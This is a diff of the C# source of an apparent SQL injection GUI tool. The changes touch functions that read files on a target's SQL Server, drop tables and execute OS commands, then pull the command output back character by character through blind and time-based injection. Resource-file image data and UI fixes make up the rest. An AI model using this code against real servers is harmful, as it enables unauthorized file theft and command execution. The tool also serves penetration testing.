@@ -8633,7 +8642,14 @@ namespace SuperSQLInjection
{
//filesystemobject读文件
String payload = SQLServer.readFileByFileSystemobject.Replace("{path}", path);
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, SQLServer.dropTable, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
String dropTable = SQLServer.dropTable;
if (config.keyType.Equals(KeyType.Time)&& config.injectType.Equals(InjectType.Blind))
{
payload= payload.Replace(" 1=1;", ";");
dropTable = dropTable.Replace(" 1=1;", ";");
}
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, dropTable, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
switch (config.injectType)
{
@@ -8947,6 +8963,7 @@ namespace SuperSQLInjection
value += Tools.unHexByUnicode(eunicode, config.readFileEncoding);
}
ver_tmp[int.Parse(index.ToString()) - 1] = value;
this.txt_log.Invoke(new showLogDelegate(log), "获取到读取的文件内容:" + Tools.StringArrayToString(ver_tmp), LogLevel.info);
m_index++;
}
@@ -9028,44 +9045,59 @@ namespace SuperSQLInjection
public void execCMDBySQLServerByUnicode(Object param)
{
String[] ps = param.ToString().Split('#');
int index = int.Parse(ps[1]);
int len = 0;
if (KeyType.Time.Equals(config.keyType))
//取值payload替换对应下标值
String unicode_data_payload = SQLServer.unicode_value.Replace("{index}", index + "").Replace("{data}", ps[0]);
//取unicode转换后的长度
String unicode_data_len_payload = SQLServer.bool_length.Replace("{data}", unicode_data_payload);
int unicode_data_len = 0;
if (config.keyType.Equals(KeyType.Time))
{
len = getValue(SQLServer.getBoolDataBySleep(SQLServer.bool_length.Replace("{data}", ps[0]), config.maxTime), 0, 8);
unicode_data_len = getValue(SQLServer.getBoolDataBySleep(unicode_data_len_payload, config.maxTime), 1, 8);
}
else
{
len = getValue(SQLServer.bool_length.Replace("{data}", ps[0]), 0, 8);
unicode_data_len = getValue(unicode_data_len_payload, 1, 8);
}
//长度范围2-8支持大部分语言
int cindex = 1;
String temUnicode = "";
while (cindex <= len)
int m_index = 1;
StringBuilder unicodes = new StringBuilder();
String value = "";
while (m_index <= unicode_data_len)
{
String tmp_payload = SQLServer.bool_value.Replace("{data}", SQLServer.substr.Replace("{data}", ps[0]).Replace("{index}", cindex + ""));
//数字加大写字母的ascii码
int ascii = 0;
if (KeyType.Time.Equals(config.keyType))
//获取多字节
String substr_payload = SQLServer.bool_value.Replace("{data}", SQLServer.substr.Replace("{data}", unicode_data_payload).Replace("{index}", m_index.ToString()));
//单个unicode值范围是0-9
int unicode = 0;
if (config.keyType.Equals(KeyType.Time))
{
ascii = getValue(SQLServer.getBoolDataBySleep(tmp_payload, config.maxTime), 0, 9);
unicode = getValue(SQLServer.getBoolDataBySleep(substr_payload, config.maxTime), 0, 9);
}
else
{
ascii = getValue(tmp_payload, 0, 9);
unicode = getValue(substr_payload, 0, 9);
}
temUnicode += ascii.ToString();
cindex++;
unicodes.Append(unicode.ToString());
m_index++;
}
int unicode = Tools.convertToInt(temUnicode);
ver_tmp[index - 1] = Tools.unHexByUnicode(unicode, "UTF-8");
this.txt_log.Invoke(new showLogDelegate(log), "获取到CMD执行结果--" + ver_tmp[index - 1], LogLevel.info);
int rstr = int.Parse(unicodes.ToString());
if (rstr <= 255)
{
value += (char)rstr;
}
else
{
value += Tools.unHexByUnicode(rstr, config.cmd_encoding);
}
ver_tmp[index - 1] = value;
this.txt_log.Invoke(new showLogDelegate(log), "获取到CMD执行结果" + HttpUtility.HtmlDecode(Tools.StringArrayToString(ver_tmp)), LogLevel.info);
Interlocked.Increment(ref this.currentDataCount);
}
@@ -9082,6 +9114,13 @@ namespace SuperSQLInjection
String cmd_16 = Tools.strToHex(cmd, "GB2312");
//执行cmd
String cmd_data_payload = SQLServer.createTableAndExecCmd.Replace("{cmd}", cmd_16);
String dropTable = SQLServer.dropTable;
if (config.keyType.Equals(KeyType.Time))
{
cmd_data_payload = cmd_data_payload.Replace(" 1=1;", ";");
dropTable= dropTable.Replace(" 1=1;", ";");
}
//修正payload
int ssindex = config.request.IndexOf("<Encode>");
int seindex = config.request.IndexOf("</Encode>");
@@ -9092,7 +9131,7 @@ namespace SuperSQLInjection
}
//修正payload
//String cmdrequest = Regex.Replace(config.request, "\\<Encode\\>(.*?)\\<\\/Encode\\>", "<Encode>#inject#</Encode>");
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, SQLServer.dropTable, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, dropTable, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, cmd_data_payload, config.request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
this.txt_log.Invoke(new showLogDelegate(log), "报告大侠CMD命令执行完成正在等待获取执行结果", LogLevel.info);
if (config.showCmdResult)
@@ -9138,8 +9177,7 @@ namespace SuperSQLInjection
//获取值
for (int j = 1; j <= len; j++)
{
String dtmp_payload = PostgreSQL.bool_value.Replace("{data}", data_payload).Replace("{index}", j + "");
stp.QueueWorkItem<string>(execCMDBySQLServerByUnicode, dtmp_payload + "#" + j);
stp.QueueWorkItem<string>(execCMDBySQLServerByUnicode, data_payload + "#" + j);
stp.WaitFor(100);
}
@@ -9695,7 +9733,13 @@ namespace SuperSQLInjection
public void stopScan()
{
StopThread();
status = -1;
if (this.currentThread != null)
{
this.txt_log.Invoke(new showLogDelegate(log), "发出停止线程信号!", LogLevel.info);
stp.Cancel();
}
this.scanInjection_btn_scan.Enabled = false;
this.scanInjection_btn_scan.Text = "正在停止...";
while (stp.InUseThreads > 0)
@@ -9704,11 +9748,18 @@ namespace SuperSQLInjection
}
this.scanInjection_btn_scan.Text = "开始扫描";
this.scanInjection_btn_scan.Enabled = true;
status = 0;
}
public void stopSpider()
{
StopThread();
status = -1;
if (this.currentThread != null)
{
this.txt_log.Invoke(new showLogDelegate(log), "发出停止线程信号!", LogLevel.info);
stp.Cancel();
}
this.scanInjection_btn_spider.Enabled = false;
this.scanInjection_btn_spider.Text = "正在停止...";
while (stp.InUseThreads > 0)
@@ -9718,6 +9769,7 @@ namespace SuperSQLInjection
this.scanInjection_btn_spider.Text = "爬行链接";
this.scanInjection_domainsCount.Text = this.scanInject_lsb_links.Items.Count.ToString();
this.scanInjection_btn_spider.Enabled = true;
status = 0;
}
public void spider()
{
@@ -10536,7 +10588,7 @@ namespace SuperSQLInjection
private void tsmi_bugReport_Click(object sender, EventArgs e)
{
MessageBox.Show("邮箱反馈1341413415@qq.com\r\nQQ群反馈84978967");
MessageBox.Show("邮箱反馈1341413415@qq.com");
}
private void data_dbs_cob_db_encoding_TextChanged(object sender, EventArgs e)
@@ -10567,7 +10619,7 @@ namespace SuperSQLInjection
this.chk_useSSL.Checked = false;
}
Uri url = new Uri(config.request);
this.txt_inject_request.Text = Spider.reqestGetTemplate.Replace("{url}", url.PathAndQuery).Replace("{host}", url.Host + ":" + url.Port);
this.txt_inject_request.Text = Spider.reqestGetTemplate.Replace("{url}", url.PathAndQuery).Replace("{host}", url.Host);
this.txt_basic_host.Text = url.Host;
this.txt_basic_port.Text = url.Port.ToString();
@@ -10751,7 +10803,15 @@ namespace SuperSQLInjection
private void btn_inject_randStr_Click(object sender, EventArgs e)
{
this.txt_inject_request.SelectedText = "<Rand>" + this.txt_inject_request.SelectedText + "</Rand>";
if (this.txt_inject_request.SelectedText.Length > 0)
{
this.txt_inject_request.SelectedText = "<Rand>" + this.txt_inject_request.SelectedText + "</Rand>";
}
if (this.txt_sencond_request.SelectedText.Length > 0)
{
this.txt_sencond_request.SelectedText = "<Rand>" + this.txt_sencond_request.SelectedText + "</Rand>";
}
}
private void txt_sencond_request_TextChanged(object sender, EventArgs e)
@@ -11190,7 +11250,6 @@ namespace SuperSQLInjection
{
i++;
this.proxy_lvw_proxyList.Invoke(new DelegateAddItemToProxy(addItemsToProxy_lvw), cproxy);
this.proxy_List.Add(cproxy.host + cproxy.port, cproxy);
}
}
}
@@ -11476,6 +11535,50 @@ namespace SuperSQLInjection
{
SelectReversNodes(this.data_lvw_ver);
}
private void btn_retry_addKey_Click(object sender, EventArgs e)
{
String key = this.txt_retry_key.Text;
if (key.Length <= 0) {
MessageBox.Show("输入重试关键词!");
return;
}
if (this.lbx_retry_sendKey.Items.Contains(key)) {
MessageBox.Show("关键词已经在列表中!");
return;
}
this.lbx_retry_sendKey.Items.Add(key);
resetRetryKeys();
}
private void resetRetryKeys()
{
StringBuilder sb = new StringBuilder();
foreach (String ikey in this.lbx_retry_sendKey.Items)
{
sb.Append(ikey + ",");
}
if (this.lbx_retry_sendKey.Items.Count > 0)
{
String allkeys = sb.Remove(sb.Length - 1, 1).ToString();
config.retryKey = allkeys;
}
}
private void cms_delRetryKey_Click(object sender, EventArgs e)
{
if (this.lbx_retry_sendKey.SelectedItems.Count>0) {
this.lbx_retry_sendKey.Items.Remove(this.lbx_retry_sendKey.SelectedItems[0]);
resetRetryKeys();
MessageBox.Show("删除成功!");
}
}
private void cbox_cmd_encoding_TextChanged(object sender, EventArgs e)
{
config.cmd_encoding = this.cbox_cmd_encoding.Text;
}
}
}

269
SuperSQLInjection/Main.resx
View File

@@ -118,17 +118,17 @@
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<metadata name="log_cms_dataifo.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>186, 17</value>
<value>278, 17</value>
</metadata>
<metadata name="img_line.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>17, 93</value>
<value>293, 93</value>
</metadata>
<data name="img_line.ImageStream" mimetype="application/x-microsoft.net.object.binary.base64">
<value>
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACU
BwAAAk1TRnQBSQFMAwEBAAGIAQABiAEAARQBAAEUAQAE/wEJAQAI/wFCAU0BNgEEBgABNgEEAgABKAMA
BwAAAk1TRnQBSQFMAwEBAAGoAQABqAEAARQBAAEUAQAE/wEJAQAI/wFCAU0BNgEEBgABNgEEAgABKAMA
AVADAAEUAwABAQEAAQgFAAFAAQYYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
@@ -164,17 +164,132 @@
</value>
</data>
<metadata name="toolStrip_getVers.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>118, 93</value>
<value>394, 93</value>
</metadata>
<assembly alias="System.Drawing" name="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
<data name="toolStrip_vers_btn_selectAll.Image" type="System.Drawing.Bitmap, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>
iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8
YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG
YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9
0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw
bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc
VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9
c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32
Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo
mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+
kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D
TgDQASA1MVpwzwAAAABJRU5ErkJggg==
</value>
</data>
<data name="toolStrip_vers_btn_selectReverse.Image" type="System.Drawing.Bitmap, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>
iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8
YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG
YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9
0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw
bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc
VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9
c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32
Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo
mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+
kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D
TgDQASA1MVpwzwAAAABJRU5ErkJggg==
</value>
</data>
<metadata name="data_cms_vers.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>573, 17</value>
</metadata>
<metadata name="data_dbs_ts.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>247, 55</value>
</metadata>
<metadata name="data_cms_dbs.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>709, 17</value>
</metadata>
<metadata name="imglist_database.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>618, 55</value>
</metadata>
<data name="imglist_database.ImageStream" mimetype="application/x-microsoft.net.object.binary.base64">
<value>
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACq
DQAAAk1TRnQBSQFMAgEBBwEAAQgBCwEIAQsBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
AwABQAMAASADAAEBAQABCAYAAQgYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
AWYDAAGZAwABzAIAATMDAAIzAgABMwFmAgABMwGZAgABMwHMAgABMwH/AgABZgMAAWYBMwIAAmYCAAFm
AZkCAAFmAcwCAAFmAf8CAAGZAwABmQEzAgABmQFmAgACmQIAAZkBzAIAAZkB/wIAAcwDAAHMATMCAAHM
AWYCAAHMAZkCAALMAgABzAH/AgAB/wFmAgAB/wGZAgAB/wHMAQABMwH/AgAB/wEAATMBAAEzAQABZgEA
ATMBAAGZAQABMwEAAcwBAAEzAQAB/wEAAf8BMwIAAzMBAAIzAWYBAAIzAZkBAAIzAcwBAAIzAf8BAAEz
AWYCAAEzAWYBMwEAATMCZgEAATMBZgGZAQABMwFmAcwBAAEzAWYB/wEAATMBmQIAATMBmQEzAQABMwGZ
AWYBAAEzApkBAAEzAZkBzAEAATMBmQH/AQABMwHMAgABMwHMATMBAAEzAcwBZgEAATMBzAGZAQABMwLM
AQABMwHMAf8BAAEzAf8BMwEAATMB/wFmAQABMwH/AZkBAAEzAf8BzAEAATMC/wEAAWYDAAFmAQABMwEA
AWYBAAFmAQABZgEAAZkBAAFmAQABzAEAAWYBAAH/AQABZgEzAgABZgIzAQABZgEzAWYBAAFmATMBmQEA
AWYBMwHMAQABZgEzAf8BAAJmAgACZgEzAQADZgEAAmYBmQEAAmYBzAEAAWYBmQIAAWYBmQEzAQABZgGZ
AWYBAAFmApkBAAFmAZkBzAEAAWYBmQH/AQABZgHMAgABZgHMATMBAAFmAcwBmQEAAWYCzAEAAWYBzAH/
AQABZgH/AgABZgH/ATMBAAFmAf8BmQEAAWYB/wHMAQABzAEAAf8BAAH/AQABzAEAApkCAAGZATMBmQEA
AZkBAAGZAQABmQEAAcwBAAGZAwABmQIzAQABmQEAAWYBAAGZATMBzAEAAZkBAAH/AQABmQFmAgABmQFm
ATMBAAGZATMBZgEAAZkBZgGZAQABmQFmAcwBAAGZATMB/wEAApkBMwEAApkBZgEAA5kBAAKZAcwBAAKZ
Af8BAAGZAcwCAAGZAcwBMwEAAWYBzAFmAQABmQHMAZkBAAGZAswBAAGZAcwB/wEAAZkB/wIAAZkB/wEz
AQABmQHMAWYBAAGZAf8BmQEAAZkB/wHMAQABmQL/AQABzAMAAZkBAAEzAQABzAEAAWYBAAHMAQABmQEA
AcwBAAHMAQABmQEzAgABzAIzAQABzAEzAWYBAAHMATMBmQEAAcwBMwHMAQABzAEzAf8BAAHMAWYCAAHM
AWYBMwEAAZkCZgEAAcwBZgGZAQABzAFmAcwBAAGZAWYB/wEAAcwBmQIAAcwBmQEzAQABzAGZAWYBAAHM
ApkBAAHMAZkBzAEAAcwBmQH/AQACzAIAAswBMwEAAswBZgEAAswBmQEAA8wBAALMAf8BAAHMAf8CAAHM
Af8BMwEAAZkB/wFmAQABzAH/AZkBAAHMAf8BzAEAAcwC/wEAAcwBAAEzAQAB/wEAAWYBAAH/AQABmQEA
AcwBMwIAAf8CMwEAAf8BMwFmAQAB/wEzAZkBAAH/ATMBzAEAAf8BMwH/AQAB/wFmAgAB/wFmATMBAAHM
AmYBAAH/AWYBmQEAAf8BZgHMAQABzAFmAf8BAAH/AZkCAAH/AZkBMwEAAf8BmQFmAQAB/wKZAQAB/wGZ
AcwBAAH/AZkB/wEAAf8BzAIAAf8BzAEzAQAB/wHMAWYBAAH/AcwBmQEAAf8CzAEAAf8BzAH/AQAC/wEz
AQABzAH/AWYBAAL/AZkBAAL/AcwBAAJmAf8BAAFmAf8BZgEAAWYC/wEAAf8CZgEAAf8BZgH/AQAC/wFm
AQABIQEAAaUBAANfAQADdwEAA4YBAAOWAQADywEAA7IBAAPXAQAD3QEAA+MBAAPqAQAD8QEAA/gBAAHw
AfsB/wEAAaQCoAEAA4ADAAH/AgAB/wMAAv8BAAH/AwAB/wEAAf8BAAL/AgAD/wEAEP8wAA/vAf8PvAUA
AQcBcgFPA0kBcgEHFAAP7wH/D+8EAAGYAU8BUASYAU8BSQEcEwAB7w3/Ae8B/wHvDf8B7wMAAZgBTwF4
AQgBmAKXAZgBCAGXAUkBHBIAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABBwFPAXgBCAaX
AQgBlwFJAQcRAAHvAf8C3AL/AtwC/wLcAv8B7wH/Ae8C/wncAv8B7wIAAXgBVgEIApcBeAEbAZgDlwEI
AU8BchEAAe8B/wLcAv8C3AL/AtwC/wHvAf8B7w3/Ae8CAAFQApgBlwF4A/8BmAKXApgBTxEAAe8B/wLc
Av8C3AL/AtwC/wHvAf8B7wL/CdwC/wHvAgABTwGYAZcBeAL/AfQC/wGYApcBmAFJEQAB7wH/AtwC/wLc
Av8C3AL/Ae8B/wHvAv8J3AL/Ae8CAAFVAQgBeAGXAQgB8QGXAQgC/wGYAZcBmAFPEQAB7w3/Ae8B/wHv
Df8B7wIAAVYCmAWXAQgB/wHzApgBTxEAAe8B9AvyAfQB7wH/Ae8B9AvyAfQB7wIAAZgBlwEIBpcBCAGX
AQgBUAGXEQABtA2zAbQB/wG0DbMBtAIAAQgBVgF4AQgGlwEIAXgBTwEHEQABswEJC9wBCQGzAf8BswEJ
C9wBCQGzAwABmAFWAXgBCAGYAngBmAEIAXgBTwGYEgABswHhC9sB4QGzAf8BswHhC9sB4QGzBAABmAFW
AZcEmAGXAVABmBMAAbMN4gGzAf8Bsw3iAbMFAAEIAZgEVgGYAQcUAA+zAf8Bug2zAbohABD/IAABEg5D
ARIB/w7UAf8gAAFtDv8BbQH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8BAA4HAgAIBwaXAQABbQH/
ARUEEQEQAxEBEAERARQB/wFtAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/
AQcCAAEHAv8BBwT/AZcECAGXAQABbQH/AeoC/wG8A/8BvAP/AeoB/wFtAf8B1AIZAfQC/wH0ARkBCQPc
AQkB1AH/AQABBwL/AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAFtAf8B6gG8AQcBvAMHAbwCBwG8
AeoB/wFtAf8O1AH/AQAOBwIACAcGlwEAAesB/wFtAv8BvAP/AbwD/wFtAf8B6wH/AdQC3AEZAvQBGQHc
AdsB2gHTAdQB2wHUAf8BAAEHAv8BBwT/AQcE/wEHAgABBwL/AQcE/wGXBAgBlwEAAesB/wFtAfAIvAHw
AW0B/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEAAQcC/wEHBP8BBwT/AQcCAAEHAv8BBwT/
AZcECAGXAQAB6wH/AesC/wHwA/8B8AP/AesB/wHrAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHbAdQB/wEA
DgcCAAgHBpcBAAHrAf8B6wIZAfEG8gHzAesB/wHrAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQABBwL/
AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQElASABGQcCAewB/wHsAf8O1AH/AQABBwL/
AQcE/wEHBP8BBwIAAQcC/wEHBP8BlwQIAZcBAAHsAf8BkQImAfQBNAVVATQB7AH/AewB/wHUAtwBGQL0
ARkB3AHbAdoB0wHUAdsB1AH/AQAOMwIACDMGNAEAAewB/wHsARkI8wH0AewB/wHsAf8B1ALcARkC9AEZ
AdwB2wHaAdMB1AHbAdQB/wEAATMCNAEzATQCVQE0ATMBNAJVATQBMwIAATMCNAEzATQCVQc0AQAB7AH/
AewC/wHzA/8B8wP/AewB/wHsAf8B1AIZAfQC/wH0ARkBCQPcAQkB1AH/AQAOMwIACDMGNAEAAewB/wzs
Af8B7AH/DtQB/yAAAewO/wHsEP8gABDtAUIBTQE+BwABPgMAASgDAAFAAwABIAMAAQEBAAEBBgABARYA
A/8DAAT/BQABAQHwAQ8FAAEBAeABBwUAAQEBwAEDBQABAQGAAQEFAAEBAYABAQUAAQEBgAEBBQABAQGA
AQEFAAEBAYABAQUAAQEBgAEBBQABAQGAAQEFAAEBAYABAQUAAQEBwAEDBQABAQHgAQcFAAEBAfABDwUA
AQEC/wQABP8EAAT/BAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA
AQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGAAQEEAAGAAQEBgAEBBAABgAEBAYABAQQAAYABAQGA
AQEEAAGAAQEBgAEBBAAE/wQABP8CAAs=
</value>
</data>
<metadata name="toolStrip1.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>508, 55</value>
</metadata>
<metadata name="cms_data_dbs_lvw_data.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>768, 55</value>
</metadata>
<metadata name="myicon_list.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>747, 17</value>
<value>843, 17</value>
</metadata>
<data name="myicon_list.ImageStream" mimetype="application/x-microsoft.net.object.binary.base64">
<value>
AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAACe
GQAAAk1TRnQBSQFMAgEBDwEAAZABCwGQAQsBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
GQAAAk1TRnQBSQFMAgEBDwEAAbABCwGwAQsBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
AwABQAMAAUADAAEBAQABCAYAARAYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
@@ -286,126 +401,8 @@
AYABAQEAAQ8B/AE/AgABgAEPAQABHws=
</value>
</data>
<metadata name="toolStrip_getVers.TrayLocation" type="System.Drawing.Point, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a">
<value>118, 93</value>
</metadata>
<assembly alias="System.Drawing" name="System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
<data name="toolStrip_vers_btn_selectAll.Image" type="System.Drawing.Bitmap, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>
iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8
YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAIDSURBVDhPpZLrS5NhGMb3j4SWh0oRQVExD4gonkDpg4hG
YKxG6WBogkMZKgPNCEVJFBGdGETEvgwyO9DJE5syZw3PIlPEE9pgBCLZ5XvdMB8Ew8gXbl54nuf63dd9
0OGSnwCahxbPRNPAPMw9Xpg6ZmF46kZZ0xSKzJPIrhpDWsVnpBhGkKx3nAX8Pv7z1zg8OoY/cITdn4fw
bf/C0kYAN3Ma/w3gWfZL5kzTKBxjWyK2DftwI9tyMYCZKXbNHaD91bLYJrDXsYbrWfUKwJrPE9M2M1Oc
VzOOpHI7Jr376Hi9ogHqFIANO0/MmmmbmSmm9a8ze+I4MrNWAdjtoJgWcx+PSzg166yZZ8xM8XvXDix9
c4jIqFYAjoriBV9AhEPv1mH/sonogha0afbZMMZz+yreTGyhpusHwtNNCsA5U1zS4BLxzJIfg299qO32
Ir7UJtZfftyATqeT+8o2D8JSjQrAJblrncYL7ZJ2+bfaFnC/1S1NjL3diRat7qrO7wLRP3HjWsojBeCo
mDEo5mNjuweFGvjWg2EBhCbpkW78htSHHwRyNdmgAFzPEee2iFkzayy2OLXzT4gr6UdUnlXrullsxxQ+
kx0g8BTA3aZlButjSTyjODq/WcQcW/B/Je4OQhLvKQDnzN1mp0nnkvAhR8VuMzNrpm1mpjgkoVwB/v8D
